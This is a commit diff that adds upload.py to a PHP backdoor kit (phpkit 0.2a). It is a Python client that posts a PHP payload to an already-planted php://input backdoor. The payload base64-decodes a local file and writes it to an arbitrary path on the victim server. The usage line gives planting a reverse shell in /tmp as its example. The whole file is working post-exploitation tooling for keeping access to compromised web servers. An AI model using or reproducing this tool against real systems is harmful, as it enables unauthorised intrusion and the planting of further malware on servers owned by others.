update

php shell and jsp shell

php/phpkit-0.2a/upload.py

@@ -0,0 +1,34 @@
+#!/usr/bin/python
+# Upload.py
+# File Upload client for the php://input based backdoor
+# Website: insecurety.net
+# Author: infodox
+# Twatter: @info_dox
+# Insecurety Research - 2013
+# version: 0.2a
+import requests
+import sys
+
+if (len(sys.argv) != 4):
+    print "Usage: " + sys.argv[0] + " <url of backdoor> <localfile> <remotefile>"
+    print "Example: " + sys.argv[0] + " http://localhost/odd.php reverseshell.py /tmp/rsh.py"
+    sys.exit(0)
+
+url = sys.argv[1]         
+localfile = sys.argv[2]
+remotefile = sys.argv[3]
+
+f = open(localfile, "r")
+rawfiledata = f.read()
+encodedfiledata = rawfiledata.encode('base64')
+
+phppayload = """<?php
+$f = fopen("%s", "a");
+$x = base64_decode('%s');
+fwrite($f, "$x");
+fclose($f);
+?>""" %(remotefile, encodedfiledata) # I need to add a hashing function sometime for corruption test.
+
+print "[+] Uploading File"
+requests.post(url, phppayload) # this is why I love the python requests library
+print "[+] Upload should be complete"